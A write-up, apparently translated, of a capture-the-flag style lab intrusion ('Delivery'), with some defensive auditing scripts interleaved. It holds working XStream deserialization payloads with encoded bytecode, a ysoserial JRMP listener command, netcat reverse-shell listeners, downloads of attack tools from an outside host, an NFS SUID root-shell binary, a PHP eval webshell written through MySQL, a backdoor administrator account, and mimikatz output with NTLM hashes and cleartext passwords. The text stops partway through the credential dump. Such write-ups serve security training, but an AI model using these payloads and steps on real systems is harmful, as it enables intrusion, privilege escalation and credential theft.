春秋云境-Delivery

No class tonight, time for a round!

This time I noticed the platform has added some stage storylines to the range, basically hints that guide the player toward the full set of targets.


XStream deserialization

```powershell
.\fscan64.exe -h 121.89.204.46 -p 1-65535
```

```text
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 121.89.204.46 is alive
[*] Icmp alive hosts len is: 1
121.89.204.46:80 open
121.89.204.46:21 open
121.89.204.46:22 open
121.89.204.46:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://121.89.204.46 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://121.89.204.46:8080 code:200 len:3655 title:公司发货单
[+] ftp://121.89.204.46:21:anonymous
[->]1.txt
[->]pom.xml
已完成 4/4
[*] 扫描结束,耗时: 5m26.9297897s
```

Ports 80 and 8080 are open, plus an anonymous FTP login, which also turned up two files. Connect and take a look first.

Download both and look at them.

In pom.xml:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>

<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>

<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>

<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>

</project>
```

The site's dependencies are visible: commons-collections 3.2.1 and xstream 1.4.16.

xstream < 1.4.18 has multiple CVEs, which I happened to have worked through before: reproductions of some CVEs

Here I chose CVE-2021-39149 to attack with; this CVE has fewer restrictions. The byte-array part was generated with ysoserial, specifying CC10.

I generated it directly with the XStream deserialization payload generator plugin bundled with the woodpecker framework, then substituted the values into the exp below.

Reverse shell command generation: Java command execution payloads - 小草窝博客
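As an added example (not code from the writeup or from the lab project), the two dependency facts read off the pom.xml above can be checked mechanically. The script parses a Maven POM and flags an XStream version below 1.4.18 and a Commons Collections 3.x release older than 3.2.2, the release that disabled unsafe functor deserialization by default. The thresholds and the minimal sample POM are assumptions drawn from the text, not project policy.

```python
"""Flag the two dependency facts the writeup reads off pom.xml.
Added example, not the project's build tooling.  The thresholds are
assumptions taken from the text: XStream below 1.4.18 and Commons
Collections below 3.2.2."""
import xml.etree.ElementTree as ET

POM_NS = {"m": "http://maven.apache.org/POM/4.0.0"}
XSTREAM_FIXED = (1, 4, 18)
CC3_FIXED = (3, 2, 2)

# Constructed minimal POM carrying the same two dependencies as the lab's.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <artifactId>ezjava</artifactId>
  <dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
      <groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId>
      <version>1.4.16</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2.1</version>
    </dependency>
  </dependencies>
</project>
"""


def parse_version(text):
    """'1.4.16' -> (1, 4, 16); qualifiers such as '-SNAPSHOT' are ignored."""
    nums = []
    for part in text.strip().split("."):
        digits = ""
        for ch in part:
            if not ch.isdigit():
                break
            digits += ch
        nums.append(int(digits) if digits else 0)
    return tuple(nums)


def dependencies(pom_xml):
    """(groupId, artifactId, version or None) for every <dependency>."""
    root = ET.fromstring(pom_xml)
    out = []
    for dep in root.findall("./m:dependencies/m:dependency", POM_NS):
        out.append((
            dep.findtext("m:groupId", default="", namespaces=POM_NS).strip(),
            dep.findtext("m:artifactId", default="", namespaces=POM_NS).strip(),
            dep.findtext("m:version", default=None, namespaces=POM_NS),
        ))
    return out


def audit_pom(pom_xml):
    """Human-readable findings; an empty list means neither risk was seen."""
    findings = []
    for group, artifact, version in dependencies(pom_xml):
        if (group, artifact) == ("com.thoughtworks.xstream", "xstream"):
            if version is None:
                findings.append("xstream: version managed elsewhere, resolve it before judging")
            elif parse_version(version) < XSTREAM_FIXED:
                findings.append(f"xstream {version} < 1.4.18: upgrade and keep an explicit allowlist")
        elif (group, artifact) == ("commons-collections", "commons-collections"):
            if version and parse_version(version) < CC3_FIXED:
                findings.append(
                    f"commons-collections {version} < 3.2.2: deserialization gadget library on the classpath")
    return findings


if __name__ == "__main__":
    for line in audit_pom(SAMPLE_POM):
        print(line)
```

A version that is inherited from a parent POM or a dependencyManagement block comes back as None; the audit reports that rather than guessing, because the effective version has to be resolved first.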

```xml
<linked-hash-set>
<dynamic-proxy>
<interface>map</interface>
<handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>
<classToInvocationHandler class='linked-hash-map'/>
<defaultHandler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Object</providerType>
<probes>
<entry>
<method>
<class>java.lang.Object</class>
<name>hashCode</name>
<parameter-types/>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADEAJgEADlQ4ODU5NjEzNTAzOTAwBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEAClNvdXJjZUZpbGUBABNUODg1OTYxMzUwMzkwMC5qYXZhAQAIPGNsaW5pdD4BAAMoKVYBAARDb2RlAQARamF2YS9sYW5nL1J1bnRpbWUHAAoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAMAA0KAAsADgEAEGphdmEvbGFuZy9TdHJpbmcHABABAAY8aW5pdD4BAAUoW0IpVgwAEgATCgARABQBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAWABcKAAsAGAEADVN0YWNrTWFwVGFibGUBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwAbAQAUamF2YS9pby9TZXJpYWxpemFibGUHAB0BABBzZXJpYWxWZXJzaW9uVUlEAQABSgWtIJPzkd3vPgEADUNvbnN0YW50VmFsdWUMABIACAoAHAAkACEAAgAcAAEAHgABABoAHwAgAAEAIwAAAAIAIQACAAgABwAIAAEACQAAArIACAACAAACnacAAwFMuAAPuwARWRBdvAhZAxBikVRZBBBhkVRZBRBzkVRZBhBokVRZBxAgkVRZCBAtkVRZEAYQY5FUWRAHECCRVFkQCBB7kVRZEAkQZZFUWRAKEGORVFkQCxBokVRZEAwQb5FUWRANECyRVFkQDhBZkVRZEA8QbZFUWRAQEEaRVFkQERB6kVRZEBIQYZFUWRATEEORVFkQFBBBkVRZEBUQdJFUWRAWEGGRVFkQFxBTkVRZEBgQQZFUWRAZECuRVFkQGhBKkVRZEBsQaZFUWRAcEEGRVFkQHRB2kVRZEB4QWpFUWRAfEEeRVFkQIBBWkVRZECEQMpFUWRAiEEyRVFkQIxAzkVRZECQQUpFUWRAlEGqRVFkQJhBjkVRZECcQQ5FUWRAoEDiRVFkQKRA0kVRZECoQTJFUWRArEGqRVFkQLBBFkVRZEC0QepFUWRAuEE2RVFkQLxBDkVRZEDAQNJFUWRAxEHqRVFkQMhBOkVRZEDMQU5FUWRA0EDSRVFkQNRB4kVRZEDYQTpFUWRA3EESRVFkQOBBnkVRZEDkQdpFUWRA6EE6RVFkQOxB6kVRZEDwQY5FUWRA9EDORVFkQPhBOkVRZED8QeZFUWRBAEEGRVFkQQRB3kVRZEEIQUJFUWRBDEGmRVFkQRBBZkVRZEEUQeJFUWRBGEH2RVFkQRxB8kVRZEEgQe5FUWRBJEGKRVFkQShBhkVRZEEsQc5FUWRBMEGWRVFkQTRA2kVRZEE4QNJFUWRBPECyRVFkQUBAtkVRZEFEQZJFUWRBSEH2RVFkQUxB8kVRZEFQQe5FUWRBVEGKRVFkQVhBhkVRZEFcQc5FUWRBYEGiRVFkQWRAskVRZEFoQLZFUWRBbEGmRVFkQXBB9kVS3ABW2ABlXsQAAAAEAGgAAAAMAAQMAAQASAAgAAQAJAAAAEQABAAEAAAAFKrcAJbEAAAAAAAEABQAAAAIABg==</byte-array>
<byte-array>yv66vgAAADEAEwEAA0ZvbwcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQAIRm9vLmphdmEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQcABwEAEHNlcmlhbFZlcnNpb25VSUQBAAFKBXHmae48bUcYAQANQ29uc3RhbnRWYWx1ZQEABjxpbml0PgEAAygpVgwADgAPCgAEABABAARDb2RlACEAAgAEAAEACAABABoACQAKAAEADQAAAAIACwABAAEADgAPAAEAEgAAABEAAQABAAAABSq3ABGxAAAAAAABAAUAAAACAAY=</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</proxy>
<implementing__method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>getOutputProperties</name>
<parameter-types/>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</defaultHandler>
</handler>
</dynamic-proxy>
</linked-hash-set>
```

```shell
nc -lvvp 7777
```

Capture the request to the service on port 8080 and POST the payload. This time it can be sent as-is, no URL encoding needed.

The shell that comes back is already root.

One advantage of the CVE-2021-39149 approach is that it pops a shell directly; the VPS doesn't need to run a ysoserial listener.

Of course, looking at other people's writeups, CVE-2021-29505 also works, combined with a CC chain for the deserialization.

First start the ysoserial listener on the VPS and specify the CC6 chain, since CC6 isn't restricted by JDK version.

```shell
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1001 CommonsCollections6 "base64编码shell"
```

Payload:

```xml
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: none</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>vpsid</string>
<int>vpsport</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>vpsip</host>
<port>vpsport</port>
</ctx>
</candidates>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
```

Then just connect with nc.

Internal network information gathering and proxy setup

```text
root@ubuntu:/# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.13.14 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe0e:5893 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:0e:58:93 txqueuelen 1000 (Ethernet)
RX packets 459875 bytes 208107117 (208.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 359412 bytes 22970196 (22.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 858 bytes 75665 (75.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 858 bytes 75665 (75.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```

wget fscan and frpc

```shell
wget http://ip/fscan_amd64
wget http://ip/frpc
wget http://ip/frpc.toml

chmod 777 *
```

Scan the internal network first

```shell
./fscan_amd64 -h 172.22.13.14/24
```

```text
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.6:88 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.6:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
[*] alive ports len is: 16
start vulscan
[+] ftp://172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] NetInfo:
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetInfo:
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle: http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] NetBios: 172.22.13.6 [+]DC XIAORANG\WIN-DC
[*] WebTitle: http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] WebTitle: http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[*] NetBios: 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[+] mysql:172.22.13.28:3306:root 123456
已完成 16/16
[*] 扫描结束,耗时: 17.154435015s
```

Set up the proxy

```shell
./frps -c ./frps.toml   # on the VPS
./frpc -c ./frpc.toml   # on the victim
```

Analyze the information collected so far

- 172.22.13.14: compromised
- 172.22.13.57: CentOS, not domain-joined
- 172.22.13.28: OA office platform on port 80, Windows Server 2016
- 172.22.13.6: domain controller XIAORANG\WIN-DC

A MySQL weak password was also obtained

```text
mysql:172.22.13.28:3306:root 123456
```

NFS mount and SSH connection

Strictly speaking, once the MySQL weak password was found, that box should have been tried first, and it's a domain member too.

But since the target description says the second stage is this CentOS box, I'll hit the CentOS system first. The order doesn't really matter: one is a domain machine and the other isn't, so taking the non-domain box first and then concentrating on the domain works just as well.

Hint:

To enable file sharing across machines and operating systems, the administrator deployed NFS on the internal network, but this decision exposed the server to potential security risk. Your task is to try to take control of this server to assess its security.

NFS default port: 2049

NFS is a network file system protocol carried over TCP/IP. With NFS, a client can access shared resources on a remote server as if they were local directories.

Scan the ports

```shell
./fscan_amd64 -h 172.22.13.57 -p 1-65535
```

```text
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 1
172.22.13.57:22 open
172.22.13.57:111 open
172.22.13.57:80 open
172.22.13.57:2049 open
172.22.13.57:20048 open
172.22.13.57:32913 open
172.22.13.57:45519 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
已完成 7/7
[*] 扫描结束,耗时: 6.657063117s
```

Only scanned once, so there may be some false positives, but 2049 should be open.

```shell
proxychains4 -q showmount -e 172.22.13.57
Export list for 172.22.13.57:
/home/joyce *
```

We can see that /home/joyce can be mounted.

Mount it directly on the 172.22.13.14 box.

But first update the package sources on that box and install the nfs-common package.

```shell
sudo sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list
sudo apt-get update
apt-get install nfs-common -y
```

Create a directory aaa under /tmp, then mount

```shell
cd /tmp
mkdir aaa
mount -t nfs 172.22.13.57:/home /tmp/aaa -o nolock
# after testing, only the target's /home directory could be mounted
```

Run

```shell
df -h
```

The mount succeeded. cd over and see what's there.

Only /home/joyce. Here we can try writing an SSH public key and then connect.

```shell
ssh-keygen -t rsa -b 4096
cd /tmp/aaa/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /tmp/aaa/joyce/.ssh/authorized_keys
```

```shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57
```

Found that the permissions weren't enough to read /flag02.txt

no_root_squash: compiling a high-privilege shell

NFS privilege escalation is used here, reference: https://xz.aliyun.com/t/11664; alternatively, the SUID ftp binary could also be used to escalate.

root_squash and no_root_squash are two options on an NFS server that control what the root user is allowed to do on the shared file system.

root_squash: when a client connects to the NFS server as root, this option maps root's privileges to an anonymous user (usually nobody or nfsnobody), limiting its access to the shared file system. This improves security by preventing a malicious root user from making unauthorized access or modifications to the shared file system.

no_root_squash: the opposite of root_squash; when a client connects to the NFS server as root, this option preserves root's privileges, giving it full access to the shared file system. This offers more flexibility but increases the security risk, since root may make unauthorized access or modifications to the shared file system.
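As an added example (not part of the original writeup), here is an /etc/exports auditor that reports the two settings that made this stage exploitable: an export visible to every client, as the showmount output above shows, and no_root_squash. The sample exports file is constructed; only the /home/joyce path mirrors the lab.

```python
"""Audit /etc/exports for the settings that made the NFS stage exploitable.
Added example, not the lab's own configuration.  Reports exports that are
visible to every host and exports that keep remote root as uid 0."""
import re

# Constructed sample exports file; only /home/joyce mirrors the showmount output.
SAMPLE_EXPORTS = """\
# build hosts share
/home/joyce *(rw,sync,no_root_squash)
/srv/data 172.22.13.0/24(ro,sync)
/var/backups 172.22.13.28(rw,sync,root_squash)
"""

# "client(opt,opt)" or a bare "client"; a bare "(opts)" means every host.
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return (path, client, options) triples, one per client spec.
    A path with no client list at all is exported to every host ('*')."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        path, specs = fields[0], fields[1:] or ["*"]
        for spec in specs:
            m = CLIENT_RE.match(spec)
            client = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, client, opts))
    return entries


def audit_exports(text):
    """Findings keyed by export path; an empty dict means nothing flagged.
    exportfs squashes root by default, so only an explicit no_root_squash counts."""
    findings = {}
    for path, client, opts in parse_exports(text):
        problems = []
        if client == "*":
            problems.append("exported to every host; restrict to the client subnet")
        if "no_root_squash" in opts:
            problems.append("no_root_squash: remote root keeps uid 0 and can plant SUID binaries; use root_squash")
        if problems:
            findings.setdefault(path, []).extend(problems)
    return findings


if __name__ == "__main__":
    for path, problems in audit_exports(SAMPLE_EXPORTS).items():
        for p in problems:
            print(f"{path}: {p}")
```

The squash check only fires on an explicit no_root_squash because root_squash is the exportfs default; a line with neither option is already safe in that respect.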

Write 2.c

```c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

/* Once the compiled binary carries the SUID bit and is owned by root,
 * it drops into a root bash session. */
int main(void)
{
    setuid(0);
    setgid(0);
    system("bash");
    return 0;
}
```

Then

```shell
chmod -s 2.c
gcc 2.c -o 2
chmod +s 2
```

Got root; read the flag.

There is also a pAss.txt in the root directory containing a credential

```text
xiaorang.lab/zhangwen\QT62f3gBhK1
```

This should work over RDP, if 3389 is open.

With this non-domain machine taken, it's time to go back to the domain.

Writing a webshell via the MySQL weak password

With the proxy hooked up, try connecting to MySQL.

secure_file_priv is empty here, so files can be written to the server.

```sql
show variables like "secure_file_priv";
```

View the MySQL service configuration details

```sql
show variables;
```

It turns out the service was started by phpstudy, and phpstudy usually runs with high privileges.

Write the webshell
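As an added example, not the lab's configuration: a small checker that reads a MySQL option file, classifies secure_file_priv the way SHOW VARIABLES reports it (empty means any path mysqld can write to, NULL means file import/export is disabled, anything else restricts writes to that directory), decides whether a given target path would be writable, and emits a hardened copy. The option-file text and directory names are constructed placeholders; the only page value is the web-root path the writeup writes into.

```python
"""Classify secure_file_priv from a MySQL option file and harden it.
Added example, not the lab's configuration.  The option file and the
C:/mysql paths are constructed placeholders."""
import configparser
import io

# Constructed weak option file: an empty secure_file_priv is what the
# writeup observed with SHOW VARIABLES.
WEAK_MY_INI = """\
[mysqld]
port = 3306
basedir = C:/mysql
datadir = C:/mysql/data
secure_file_priv =
"""


def _load(cfg_text):
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(cfg_text)
    return cfg


def secure_file_priv_status(cfg_text):
    """'unrestricted' (empty), 'disabled' (NULL), 'restricted:<dir>', or
    'unset' when the build default applies and SHOW VARIABLES must decide."""
    cfg = _load(cfg_text)
    if not cfg.has_option("mysqld", "secure_file_priv"):
        return "unset"
    value = cfg.get("mysqld", "secure_file_priv").strip()
    if value == "":
        return "unrestricted"
    if value.upper() == "NULL":
        return "disabled"
    return "restricted:" + value.replace("\\", "/").rstrip("/")


def outfile_allowed(status, target_path):
    """Would SELECT ... INTO OUTFILE be permitted to write target_path?
    Returns None for 'unset' because the answer depends on the build."""
    if status == "unset":
        return None
    if status == "unrestricted":
        return True
    if status == "disabled":
        return False
    allowed_dir = status.split(":", 1)[1]
    return target_path.replace("\\", "/").startswith(allowed_dir + "/")


def harden(cfg_text, export_dir=None):
    """Return the option file with secure_file_priv set to NULL, or to a
    dedicated export directory when file import/export is really needed."""
    cfg = _load(cfg_text)
    if not cfg.has_section("mysqld"):
        cfg.add_section("mysqld")
    cfg.set("mysqld", "secure_file_priv", export_dir if export_dir else "NULL")
    out = io.StringIO()
    cfg.write(out)
    return out.getvalue()


if __name__ == "__main__":
    target = "C:/phpstudy_pro/WWW/1.php"  # the web-root file the writeup wrote
    before = secure_file_priv_status(WEAK_MY_INI)
    after = secure_file_priv_status(harden(WEAK_MY_INI))
    print(before, outfile_allowed(before, target))
    print(after, outfile_allowed(after, target))
```

The directory check compares normalised paths with a trailing slash appended, so a restricted value of C:/mysql/export does not accidentally authorise C:/mysql/export-old; the same write would also still need the FILE privilege, which is a separate control worth auditing with SHOW GRANTS.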

```sql
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
```

Connect with AntSword (蚁剑)

The flag in the Administrator directory can be read directly, which suggests SYSTEM privileges.

In the virtual terminal, create a high-privilege user for remote connection

```powershell
net user hey qwer1234! /add
net localgroup administrators hey /add
```

WriteDacl to DCSync

Connect remotely and upload SharpHound and mimikatz

For some reason the added user hey can't collect data; it's probably still a user-group/permissions issue, so switch to the AntSword virtual terminal to run it.

```powershell
SharpHound.exe --CollectionMethods ALL --Domain XIAORANG.LAB
```

Download and analyze

```powershell
./neo4j.bat console
```

The user CHENGLEI is a member of the ACL Admins group and has WriteDacl over WIN-DC, so DCSync rights can be written in to take the domain controller.

Dump the passwords first

```powershell
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit"
```

```text
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 15522640 (00000000:00ecdb50)
Session : RemoteInteractive from 2
User Name : hey
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2024/3/4 20:59:12
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : hey
* Domain : WIN-HAUWOLAO
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : hey
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : hey
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 15499913 (00000000:00ec8289)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/4 20:59:11
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : cd 0a 72 f9 69 a1 9e bb c7 89 ea a4 c0 9e bc 2d 07 d6 bf fd 12 20 82 ec da e9 76 4e 46 42 ab e8 93 93 a0 21 3a 91 68 1f e8 29 d5 91 63 bc 75 fc a8 8b 38 54 95 75 83 6f 77 18 f1 e3 54 92 ff 5e 44 57 39 b3 e6 02 bc 4c 1a eb d8 9f e7 56 19 81 5c ab 21 f6 41 80 8c 3d 95 94 b8 45 58 1a ef 76 d3 df 72 72 35 ee 26 f3 e0 28 db 89 ff ee 9f 08 be 12 a9 01 16 92 ec 58 ec 38 92 a7 33 b5 85 a5 89 a1 99 e6 b7 b2 bc 4d d3 f3 76 aa b8 1f b0 17 64 81 3a e4 24 58 1a ad 4e 6a 33 53 7c 27 cd 3b 43 99 d0 ad cd 5f b1 d2 3e 25 cc 19 f1 ef c8 de ce 9d ba 2e c0 77 c3 aa 6c de e3 eb be 12 9b 52 b6 3e 23 0b bd 0f 59 c5 00 0a 65 f7 19 a8 3f 54 45 49 25 aa 6c 76 ce 5c e1 c9 69 eb 23 d1 1d 73 0d df df 6c d3 a5 27 e7 c0 1e 48 65 7b f2 89 0d
ssp :
credman :
Authentication Id : 0 ; 86094 (00000000:0001504e)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2024/3/4 18:58:45
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
Authentication Id : 0 ; 52684 (00000000:0000cdcc)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/3/4 18:58:43
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 801bb9d88ba59b0a597517b71fbedf0e
* SHA1 : 7c833ed2023288f842f00746fced0ab45aeddf72
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
